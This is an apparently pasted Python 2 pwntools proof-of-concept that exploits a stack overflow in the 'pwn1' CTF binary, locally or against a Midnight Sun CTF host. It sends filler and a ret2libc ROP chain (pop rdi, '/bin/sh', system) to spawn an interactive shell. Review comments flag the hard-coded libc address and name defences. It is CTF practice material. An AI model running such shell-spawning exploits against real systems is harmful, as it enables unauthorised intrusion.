Untitled

a guest
Apr 3rd, 2020
#!/usr/bin/env python
"""Proof-of-concept ret2libc script for the `pwn1` CTF binary (pwntools).

Consumes the challenge prompt, then sends 72 bytes of filler followed by a
three-entry ROP chain (pop rdi; "/bin/sh"; system) and hands the connection
to an interactive session.  Written against Python 2 (`.next()`, ``str``
join of ``p64()`` output) -- presumably does not run unchanged on Python 3.
`sys` is imported but never used.
"""

import sys
from pwn import *

elf = ELF('./pwn1')

local = True
offset = "A"* 72  # filler up to the saved return address; 72 presumably measured for this binary -- confirm
if local:
    p = elf.process()
    # libc = ELF('/lib64/ld-linux-x86-64.so.2')
    libc = ELF('libc.so')
else:
    host = "pwn1-01.play.midnightsunctf.se"
    port = 10001
    p = remote(host, port)
    libc = ELF('libc.so')


# Consume the prompt.  NOTE(review): nothing is parsed from the response, so
# despite the wording of the original comment there is no libc leak here --
# the base address below comes from a hard-coded constant.

p.recvuntil('buffer: ')

# NOTE(review): hard-coded printf address, presumably copied from a debugger
# run with ASLR disabled.  It only holds while libc is mapped at the same
# place; against the remote target (ASLR on) this constant is presumably wrong.
PRINTF_LIBC = 0x7ffff7e4ea20
libc.address = PRINTF_LIBC - libc.symbols['printf']  # rebase the ELF object so later symbol lookups are absolute
system = libc.symbols['system'] #Find the address for system to use with /bin/sh

pop_rdi = 0x0000000000400783 # pop rdi ; ret, found with  Ropper (fixed address => binary presumably built without PIE; confirm with checksec)
bin_sh = libc.search('/bin/sh').next() # find address where /bin/sh is. (Python 2 iterator API)

# Create the rop chain: pop rdi <- &"/bin/sh"; ret into system().
# Defender's note: a stack canary would detect the overwrite before the
# return, and PIE/ASLR would invalidate both fixed addresses used here.
rop_chain = [
    pop_rdi, bin_sh,
    system
]

rop_chain = ''.join([ p64(r) for r in rop_chain ])  # Python 2: str concatenation of p64() output

payload = offset + rop_chain  # filler + chain, sent as a single write

p.send(payload)

p.interactive()